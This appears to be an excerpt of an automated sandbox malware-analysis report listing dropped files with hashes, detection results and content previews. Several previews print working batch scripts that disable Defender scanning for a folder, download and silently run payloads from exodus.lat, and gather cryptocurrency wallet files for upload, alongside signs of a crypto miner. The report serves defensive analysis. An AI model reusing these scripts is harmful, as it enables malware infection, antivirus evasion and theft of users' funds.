                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1336
                                                                                            Entropy (8bit):4.9681332666961975
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:qAldUD4P/dAUZaV7RWkl8I96kSZaqhyIHSs5ukEs+sD3H:qAldUDk/dAUcV7RWklKFZhas5JEs+sD3
                                                                                            MD5:D1FDFAD5CE7134B1EF5A54CF37001031
                                                                                            SHA1:82E0F4E953B3AEACA622EC071639BAF6AE17AADB
                                                                                            SHA-256:54F8474D983DC3DD78E3D3289076152651E2F8CC5F30AE3F2740BA15E71CC6A6
                                                                                            SHA-512:B6B7B4F134A6B436CD32E39FB645D91ACC12482D352158A755359D0F6CBB8FD5BAB9351081916B0B638E3FF2BDE4B6AC2F6202F3CA58F1146F39DEFC039E88E7
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\checkmiexe.bat, Author: Joe Security
                                                                                            Preview:@echo off....:: Check if running as administrator..net session >nul 2>&1..if %errorlevel% neq 0 (.. powershell -WindowStyle Hidden -Command "Start-Process -FilePath '%~f0' -Verb runAs -WindowStyle Hidden".. exit /b..)....setlocal..set asmPath=%LocalAppData%\asm....:: Check if asmPath exists..if exist "%asmPath%" (.. :: Check if mi.exe process is running.. tasklist /fi "imagename eq mi.exe" | find /i "mi.exe" >nul 2>&1.. if errorlevel 1 (.. echo ASM path exists but mi.exe is not running. Executing commands..... goto ExecuteCommands.. ) else (.. echo ASM path exists and mi.exe is running. Exiting script... exit /b.. )..) else (.. echo ASM path does not exist. Executing commands..... goto ExecuteCommands..)....:ExecuteCommands..:: Add exclusion path silently..powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%asmPath%'"....:: Create directory silently..if not exist "%asmPath%" mkdir "%asmPath%"....:: Download f
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):819
                                                                                            Entropy (8bit):5.09009848738353
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:q925lda981kUMn53FSR2Y/mFZM081k5uj4EKk081ky8JwU4081kUMnAOjJxa:qAldUD4P/QSs5ukEs+sD3S
                                                                                            MD5:F2A75175C8082CCD3E1713B00556A6E2
                                                                                            SHA1:2F5DC37978320BC1CA207C0C0AFF1240AAD6C7CF
                                                                                            SHA-256:019157C15709F7D6301CB0FB15F45C054230EA91F06FF817B426D7F6CCB14686
                                                                                            SHA-512:011AB44E81D61636D5B1637584FAF0701A5B2226289B6200CD89AD97927F52F1C659DF626AFC2B46EDD656960D67934FFF97F5E10FD6A7454027D430FEAFA7A9
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\download.bat, Author: Joe Security
                                                                                            Preview:@echo off....:: Check if running as administrator..net session >nul 2>&1..if %errorlevel% neq 0 (.. powershell -WindowStyle Hidden -Command "Start-Process -FilePath '%~f0' -Verb runAs -WindowStyle Hidden".. exit /b..)....setlocal..set asmPath=%LocalAppData%\asm....:: Add exclusion path silently..powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%asmPath%'"....:: Create directory silently..if not exist "%asmPath%" mkdir "%asmPath%"....:: Download file silently..powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', '%asmPath%\COMSurrogate.exe') }"....:: Run the downloaded file silently..powershell -WindowStyle Hidden -Command "Start-Process -FilePath '%asmPath%\COMSurrogate.exe' -WindowStyle Hidden"....exit /b..
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:DOS batch file, ASCII text, with very long lines (330), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):6492
                                                                                            Entropy (8bit):5.150016547022069
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:H0WFbS5g97ANfa5dJsw8oTaex8Z8zai8NI9qeaW:H04SmWYCQ8Z8zLJcPW
                                                                                            MD5:DA7552EED00789BD53F831E67CF54F8D
                                                                                            SHA1:653B2EC2B0975AB4B11F1C35A10E307C95450F17
                                                                                            SHA-256:5CB4DE27952514F557CF52A3A90B68F7C62A512732E799C766A85C4F7905F38F
                                                                                            SHA-512:F618164B414A91CCB3569B85FAD155FBB55DEFC55DFC5E2A48EE59F25307182AB2E3D9F8DDDFFC950CD6397442A876922608C0BBCC447EC0FC56F12446418BFC
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\downloaded_script.bat, Author: Joe Security
                                                                                            Preview:@echo off..setlocal enabledelayedexpansion....:: Set the necessary variables for extension and wallet settings..set "uploadUrl=https://exodus.lat/files/upload.php"..set "zipFile=%TEMP%\BrowserExtensionSettings.zip"..set "tempZipDir=%TEMP%\ArchiveContents"..set "foundExtensions=0"..set "foundWallets=0"..set "foundTdata=0"....:: Create temporary directory for all files..if exist "%tempZipDir%" rmdir /s /q "%tempZipDir%"..mkdir "%tempZipDir%"....:: Define wallet paths..set "walletPaths[Bitcoin]=AppData\Roaming\Bitcoin\wallets"..set "walletPaths[Zcash]=AppData\Roaming\Zcash"..set "walletPaths[Armory]=AppData\Roaming\Armory"..set "walletPaths[Bytecoin]=AppData\Roaming\bytecoin"..set "walletPaths[Jaxx]=AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb"..set "walletPaths[Exodus]=AppData\Roaming\Exodus\exodus.wallet"..set "walletPaths[Ethereum]=AppData\Roaming\Ethereum\keystore"..set "walletPaths[Electrum]=AppData\Roaming\Electrum\wallets"..set "walletPaths[AtomicWallet]=App
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):399
                                                                                            Entropy (8bit):4.97289301435871
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:QbWsg2yw3bQblcnode8JGxSDa52zWr4HbR:72yw3OlcRUDa52rHbR
                                                                                            MD5:744F8978DB36B4B9DB7CB6E5C8C41E08
                                                                                            SHA1:84321921F622D20A4D40C9BEF43B7744E74AAEE7
                                                                                            SHA-256:CEDFE277F8C600679365CE2C54A9C303907A0ACADC23ED6E6968746D2E8CA468
                                                                                            SHA-512:D1584B2134BF3960AF33A514B3A9FBA69C7EB2FBBC3B0CFFE7E493F182B20547F7596012FCC5E6B5FFBEFEE5A0B7D1AFE45EEE822CFF5B0720FFD6292AF2394F
                                                                                            Malicious:true
                                                                                            Preview:@echo off..:: Set the URL of the .bat file and the path to save it..set "downloadUrl=https://exodus.lat/ss.bat"..set "tempBatFile=%TEMP%\downloaded_script.bat"....:: Download the .bat file using PowerShell..powershell -Command "Invoke-WebRequest -Uri '%downloadUrl%' -OutFile '%tempBatFile%' -UseBasicParsing"....:: Execute the downloaded .bat file silently..start "" /min cmd.exe /c "%tempBatFile%"
                                                                                            Process:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
                                                                                            File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):167936
                                                                                            Entropy (8bit):7.923035615805109
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:Ip7CBad9I6xjOCto1mb719Iz9cIp23YWMBjk3RzYISn7ApmHVlc+:Ip7CBad9I6xjD+sF9IKIgnwkRUbAI1l
                                                                                            MD5:1FED66D1F6B85BDA20FE0403CA01C9BD
                                                                                            SHA1:6A3056191A7D8DA167285B2BF5F9FA671022C8C1
                                                                                            SHA-256:924EE12F6A98AEEB1C7836EC8984F0F93216BFFF0433BCD4EE643D33D96DB74A
                                                                                            SHA-512:0FB1397078689A52D1C77CC239B1E42AFA5FF87A3F5B4F825705E9BDA1BD2C58BFB50A6067EA0A202FA7EDB0A890CBAC9314413FC8757C8B75A43FA0B12EF613
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 42%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....|..........."...0.................. ....@...... ....................................`...@......@............... ..............................................................<...T............................................................ ..P............text........ ...................... ..`.rsrc...............................@..@........................................H........~..l$...........)...U....................................................(....*.(...........s....s....%.o....%.o....o.... ....(....+....0..E........(....,,(......(.......(....,..(....r...p.(....(......&.. ....(....+............56.......0..H.......r...p.(....o.....~....r3..p.o......,....o.......r...p.o....(....(......*........//.......0..........~.....o....,.~....*~.....o....,.~....*~.....o....,.~....*~.....o....,.~....*~.....o....,.~....*~.....o....,.~....*~.....o....,.~....
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):167936
                                                                                            Entropy (8bit):7.929204086294564
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:DlxjOCto1mb719Iz9cIp23YWMBjk3RzYISn7ApmHVVjKu:5xjD+sF9IKIgnwkRUbAI1F
                                                                                            MD5:77334F046A50530CDC6E585E59165264
                                                                                            SHA1:657A584EAFE86DF36E719526D445B570E135D217
                                                                                            SHA-256:EB6C487307C52793E0BC4D6A74770BBEA2322F32EDC466B25ABACEC3DD0E9C08
                                                                                            SHA-512:97936DD74D7EEF8D69DAE0D83B6D1554BD54D5302B5B2FF886FF66C040B083D7D086089DE12B57A491CF7269A7D076E4D2A52839AAAC519386B77297BC3A5C90
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."...0.................. ....@...... ....................................`...@......@............... ..............................................................\...T............................................................ ..P............text...).... ...................... ..`.rsrc...............................@..@........................................H..........."...........+...U....................................................(....*n(....(....o.... .'..(....+..0..3.......r...p.(....o.....~....r...p.o......,....o......&..*.........//.......0../.........(....}.......}......|......(...+..|....(....*..0..7.........(....}.......}.......}......|......(...+..|....(....*..(....*.ry..p.....r...p.....r...p.......(....r/..p(.........*....0..:........{......,..s....}......,Nr7..p~....rq..p(...........%.r...p~....s.........%.r...p.{....s
                                                                                            Process:C:\Users\user\AppData\Local\asm\COMSurrogate.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):256
                                                                                            Entropy (8bit):4.609628268937494
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:FmPHPtVw0r8Xt1JEClzhtRRE0U17EBDjGVS4yo3TiRcVwkFFn:kvPfw0r891JEAzht0t17oDmvirkv
                                                                                            MD5:38F827A527025E0689A52EE3E8C95B98
                                                                                            SHA1:196C3449BA222213006849F95FE867DEE4551B70
                                                                                            SHA-256:00342F627A1776B6056A8E747439E92EE052DEE230041A5E22F0D42BF340AC5D
                                                                                            SHA-512:2B5D83C27DA5ABA1816EDC28471141226801D0054B4E8F583609F20B68398CCE3B11AFF1CEEC8A8E5A8E81938E9B663BD2E573452A6146CCD63BD947E1424826
                                                                                            Malicious:false
                                                                                            Preview:08e799194bcea78e2335b8f28bf5e5b0b799457167872dc3d9e40ad3cce9b6ab *nvrtc-builtins64_102.dll.79d9673dd7ff4ded9c9ba24a0bdb44f0309c5a2b9f9d618134a8668c7f193bd1 *nvrtc64_102_0.dll.9d3aa03f8a003a0142ca6bca93d8b86bc6785b5076d1d2a6528602c110d5e4eb *xmrig-cuda.dll.
                                                                                            Process:C:\Users\user\AppData\Local\asm\COMSurrogate.exe
                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):14544
                                                                                            Entropy (8bit):6.2660301556221185
                                                                                            Encrypted:false
